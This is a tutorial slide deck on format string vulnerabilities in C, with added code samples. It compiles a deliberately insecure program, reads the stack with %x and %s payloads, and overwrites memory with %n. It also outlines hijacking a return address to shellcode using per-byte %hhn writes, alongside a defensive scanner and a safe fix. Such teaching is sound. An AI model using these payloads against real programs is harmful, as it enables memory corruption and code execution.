[MOSUT] Format String Attacks
AJ
2014.1.18
About Me
• Studying at National Chung Cheng University

• Simulator of a 5-axis CNC machine tool

• CUDA programming for real-time collision detection

• 若渴計畫 & MOSUT
Outline
• Illustrating format string vulnerabilities
• A case study
  • fsa.c
  • Compile and set up an insecure environment
  • Viewing the stack
  • Viewing memory at any location
  • Overwriting arbitrary memory
• So, you can…
Format String Vulnerabilities
• The bug: the format string is attacker-controlled, e.g. argv[1] handed straight to a printf-family function
• printf(argv[1])
• snprintf(buf, sizeof buf, argv[1]);
• strcpy(buff, argv[1]) and then printf(buff): the copy itself is not the bug, but it is how user input usually reaches the format argument
• … and the same for every other function that takes a format (fprintf, sprintf, syslog, …)

• EX:
compile & execute
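The pattern above side by side with its hardened form, as an added example that is not code from the slides (fsa.c itself is shown only as an image). The logging-style wrapper `log_fmt`, the buffer sizes and the sample input "100%% done" are constructed for this example; only `%%` is pushed through the vulnerable path, because a real `%x` or `%n` would read or write stack words the program does not own. The scanner at the end is the check a reviewer or a pre-call guard would want: it counts conversions in a string that is about to be used as a format and says whether any of them is `%n`.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides): the vulnerable pattern the
 * slides list, the hardened form, and a scanner that flags conversion
 * specifiers in text about to reach a printf-family format argument. */

/* A logging-style wrapper: the compiler cannot see that `fmt` came
 * from the user, so -Wformat-security never fires here. The slides get
 * the same silence with -Wno-format-security. */
static int log_fmt(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Vulnerable: the user string IS the format string. */
int vulnerable_copy(char *out, size_t n, const char *user)
{
    return log_fmt(out, n, user);
}

/* Hardened: the format is a literal; the user string is only data. */
int safe_copy(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "%s", user);
}

/* 1 if the two versions produce different text for `user`, i.e. the
 * vulnerable one interpreted something in it. */
int interprets_format(const char *user)
{
    char a[256], b[256];
    vulnerable_copy(a, sizeof a, user);
    safe_copy(b, sizeof b, user);
    return strcmp(a, b) != 0;
}

/* Count printf conversions in `s`; "%%" is a literal percent sign and
 * is not counted. If has_n is non-NULL it is set to 1 when any
 * conversion is %n (the one that writes memory). Usable as a guard in
 * front of any printf-family call whose format is not a literal. */
int count_conversions(const char *s, int *has_n)
{
    int count = 0;
    if (has_n) *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }          /* "%%" */
        count++;
        p++;
        /* flags, width, precision, '$' positions, length modifiers */
        while (*p && strchr("-+ #0123456789.*$hlLqjzt", *p)) p++;
        if (!*p) break;                              /* lone '%' at the end */
        if (*p == 'n' && has_n) *has_n = 1;
    }
    return count;
}

int contains_percent_n(const char *s)
{
    int n;
    count_conversions(s, &n);
    return n;
}

int main(int argc, char **argv)
{
    const char *user = argc > 1 ? argv[1] : "100%% done";   /* constructed default */
    int n;
    int c = count_conversions(user, &n);
    printf("conversions: %d, contains %%n: %d\n", c, n);
    if (c == 0) {
        char out[256];
        vulnerable_copy(out, sizeof out, user);   /* "100% done": %% was interpreted */
        printf("%s\n", out);
    } else {
        printf("refusing to use input as a format string\n");
    }
    return 0;
}
```

Run it with an argument such as `'%x.%x.%x.%x.%n'` and the guard refuses; the fix that makes the guard unnecessary is the one-line change in `safe_copy`, a literal `"%s"` format.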
A Case Study: fsa.c
A Case Study: Compile and Set Up an Insecure Environment
• Compile
• gcc -g -Wno-format-security -fno-stack-protector fsa.c
  (-Wno-format-security only silences the warning about a non-literal format; -fno-stack-protector removes the stack canary; no -O is given, so Ubuntu's default _FORTIFY_SOURCE, which aborts on %n in a writable format string, stays inactive)

• Disable ASLR (address space layout randomization)
• sudo sysctl -w kernel.randomize_va_space=0

• x86 (32-bit) machine & Ubuntu 12.04
Stack Status before Executing snprintf()
(figure: the stack just before the call; from low to high addresses: esp, three words marked ??, x = 97 = 'a', buf[100])
Viewing the Stack: "%x.%x.%x.%x.%x"
• Format string = %x.%x.%x.%x.%x (argv[1]; the figure draws it in a separate box because it lives outside snprintf's frame)

• snprintf(buf, sizeof buf, argv[1])
  => snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")

• With the C calling convention the arguments are pushed right to left, so at the call the stack holds, from low to high addresses:
  buffer pointer (buf)
  buffer length (sizeof buf)
  argv[1] pointer (the format string)
  ?? b7ff3fec
  ?? bffff3b4
  ?? 0
  x = 97 = 'a'
  buf[100]

• No argument was passed for any %x, so snprintf simply reads the next word above the format-string pointer for each one

• C calling convention: http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html
• Richard Reese, Understanding and Using C Pointers (透視C語言指標), p.128
Viewing the Stack: "%x.%x.%x.%x.%x" (fetch)
• snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")
• Each %x fetches the next word above the argv[1] pointer:
  %x → ?? b7ff3fec
  %x → ?? bffff3b4
  %x → ?? 0
  %x → x = 97 = 'a'
  %x → buf[100] (the first four bytes of buf itself)
Viewing the Stack: "%x.%x.%x.%x.%x" (copy)
• snprintf(buf, sizeof buf, "%x.%x.%x.%x.%x")
• glibc's vsnprintf formats straight into buf, conversion by conversion: output for one %x is copied into buf before the argument for the next one is fetched
• So when the fifth %x fetches its word, buf[0..3] already holds "b7ff", the first four characters of the output
• Read as a little-endian word, 'b' '7' 'f' 'f' = 62 37 66 66 is 0x66663762, which is what the fifth %x prints (the slide's "ff7b" is those same bytes written in reverse)

• Result: buf[100] = "b7ff3fec.bffff3b4.0.61.66663762"
Viewing the Stack: "aaaa.%x.%x.%x.%x.%x"
• Format string = aaaa.%x.%x.%x.%x.%x
• 'a' is 0x61 in ASCII
• snprintf(buf, sizeof buf, "aaaa.%x.%x.%x.%x.%x")
  %x → ?? b7ff3fec
  %x → ?? bffff3a4 (a stack address, so it shifts a little as the argument length changes, even with ASLR off)
  %x → ?? 0
  %x → x = 97 = 'a'
  %x → buf[100], whose first four bytes are now the "aaaa" just copied in: 61616161

• Result: buf[100] = "aaaa.b7ff3fec.bffff3a4.0.61.61616161"
• Seeing 61616161 at the fifth %x confirms that the fifth argument slot is buf itself: whatever is placed at the start of the format string becomes the word the fifth conversion uses
Viewing Memory at Any Location
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%x
  The fifth %x now prints bffff2f8: the four raw bytes at the front of the format string, read little-endian from buf[0..3]

• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%s
  %s treats that same word as a pointer and prints the bytes at 0xbffff2f8, which here is the address of x = 97 = 'a'; the int's bytes are 61 00 00 00, so "a" is printed
• The address goes in as little-endian raw bytes, and it must contain no 0x00 byte, since argv[1] is a C string
Overwriting Arbitrary Memory
• %n produces no output; it stores the number of bytes output so far through the pointer it takes as its argument
• Format string = $(printf "\xf8\xf2\xff\xbf").%x.%x.%x.%x.%n

• Bytes output before %n: 4 (address bytes) + ".b7ff3fec." (10) + "bffff3b4." (9) + "0." (2) + "61." (3) = 28

• Before: bffff2f8 → x = 97 = 'a'    (with %s, the word bffff2f8 in buf[0..3] was a pointer to read through)
• After:  bffff2f8 → x = 28 = 0x1c   (with %n, the same pointer is written through)
So, You Can…
• With a format string vulnerability you can
• view the stack
• find return addresses
• overwrite a return address
• overwrite a return address so that it points to shellcode

• EX (the raw bytes stand for the address of the saved return address):
$ ./a.out $(printf "return address").%x.%x.%x.%x.%n
=> return address = 28
$ ./a.out $(printf "return address").%x.%x.%x.%4x.%n
=> return address = 30      (%4x pads "61" to 4 characters)
$ ./a.out $(printf "return address").%x.%x.%x.%8x.%n
=> return address = 34
$ ./a.out $(printf "return address").%Xx.%Yx.%Zx.%Ax.%n
=> return address = shellcode address, once the widths X, Y, Z, A are chosen so that the byte count equals that address

• In practice one %n cannot be pushed to a full 32-bit address (that would mean gigabytes of output); exploits write the value one byte (%hhn) or two bytes (%hn) at a time, each write padded so that the running count modulo 256 or 65536 matches the byte(s) wanted at that address
You can overwrite arbitrary memory if there is a format string vulnerability.
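The counting behind the examples above, worked through in code as an added example that is not part of the slides. The four stack words are the ones from the slides' dump (b7ff3fec, bffff3b4, 0, 0x61) and are replayed here as plain arguments; the target 0x0804a3c1 is a constructed stand-in for "shellcode address". It goes one step further than the slides: `plan_hhn_widths` computes the four field widths that make successive `%hhn` writes land an arbitrary 32-bit value, and `apply_hhn_plan` carries them out with real `%hhn` conversions into bytes the program owns, so nothing here touches foreign memory.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example (not from the slides): the byte-count arithmetic behind
 * "%x.%x.%x.%4x.%n", first via snprintf's return value, then via a real
 * %n, and finally the per-byte %hhn plan used to land a full 32-bit
 * value. Every %n here writes into this program's own variables. */

/* The four raw bytes at the front of the slides' format string. Kept as
 * a separate literal so the hex escapes cannot swallow the '.' after it. */
#define ADDR_BYTES "\xf8\xf2\xff\xbf"

/* Bytes emitted before a trailing %n for the slides' layout: address
 * bytes, then four %x words, the last one padded to `width` (0 = none).
 * snprintf(NULL, 0, ...) returns the length without writing anything. */
int count_before_n(unsigned w1, unsigned w2, unsigned w3, unsigned w4, int width)
{
    return snprintf(NULL, 0, ADDR_BYTES ".%x.%x.%x.%*x.", w1, w2, w3, width, w4);
}

/* The same count delivered by %n itself: glibc stores it through the
 * pointer argument, exactly as it would through a pointer fetched from
 * the stack. */
int store_count_with_n(unsigned w1, unsigned w2, unsigned w3, unsigned w4, int width)
{
    char out[256];
    int written = -1;
    snprintf(out, sizeof out, ADDR_BYTES ".%x.%x.%x.%*x.%n",
             w1, w2, w3, width, w4, &written);
    return written;
}

/* One %n cannot realistically emit ~3 GB to reach a 32-bit address, so
 * the value is written a byte at a time with %hhn at addr..addr+3. Each
 * write needs (running count) % 256 == wanted byte. `already` is what
 * was emitted before the first padded conversion (4 for the address
 * bytes). widths[i] is the field width for the i-th "%*x" of the value
 * 0, which prints at least one character, so 256 replaces a width of 0. */
void plan_hhn_widths(uint32_t value, int already, int widths[4])
{
    int count = already;
    for (int i = 0; i < 4; i++) {
        int want = (int)((value >> (8 * i)) & 0xffu);
        int pad = (int)((unsigned)(want - count) & 0xffu);
        widths[i] = pad ? pad : 256;
        count += widths[i];
    }
}

int hhn_width(uint32_t value, int already, int i)
{
    int w[4];
    plan_hhn_widths(value, already, w);
    return w[i];
}

/* Carry the plan out with real %hhn conversions. The four bytes of `b`
 * stand in for addr..addr+3; the return value is what an attacker would
 * find at addr afterwards. */
uint32_t apply_hhn_plan(uint32_t value, int already)
{
    int w[4];
    signed char b[4] = {0, 0, 0, 0};
    char scratch[2048];                 /* 4 * 256 + `already` fits easily */
    plan_hhn_widths(value, already, w);
    snprintf(scratch, sizeof scratch,
             "%*s%*x%hhn%*x%hhn%*x%hhn%*x%hhn",
             already, "",               /* stands in for the address bytes */
             w[0], 0u, &b[0], w[1], 0u, &b[1],
             w[2], 0u, &b[2], w[3], 0u, &b[3]);
    return (uint32_t)(unsigned char)b[0]
         | (uint32_t)(unsigned char)b[1] << 8
         | (uint32_t)(unsigned char)b[2] << 16
         | (uint32_t)(unsigned char)b[3] << 24;
}

int main(void)
{
    /* Replay of the slides' stack words (constructed, not read from a stack). */
    printf("%%x.%%x.%%x.%%x.%%n  -> %d\n", count_before_n(0xb7ff3fec, 0xbffff3b4, 0, 0x61, 0));
    printf("%%x.%%x.%%x.%%4x.%%n -> %d\n", count_before_n(0xb7ff3fec, 0xbffff3b4, 0, 0x61, 4));
    printf("%%x.%%x.%%x.%%8x.%%n -> %d\n", count_before_n(0xb7ff3fec, 0xbffff3b4, 0, 0x61, 8));
    uint32_t target = 0x0804a3c1u;
    int w[4];
    plan_hhn_widths(target, 4, w);
    printf("widths for %08x: %d %d %d %d -> wrote %08x\n",
           target, w[0], w[1], w[2], w[3], apply_hhn_plan(target, 4));
    return 0;
}
```

In a real format string the four `%hhn` pointers are not passed as arguments but placed at the front of the string as raw bytes (addr, addr+1, addr+2, addr+3), and each is reached with `%N$hhn` or by stepping through the stack with the preceding conversions; the width arithmetic is unchanged.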
Reference
• Tim Newsham, "Format String Attacks"
  http://www.thenewsh.com/~newsham/format-string-attacks.pdf

• Stack Overflow, "How can a Format-String vulnerability be exploited?"
  http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerability-be-exploited

• Paul Haas, "Advanced Format String Attacks" (DEF CON 18)
  http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18-Haas-Adv-Format-String-Attacks.pdf

• David Brumley, course slides
  http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf

• scut / team teso, "Exploiting Format String Vulnerabilities"
  http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
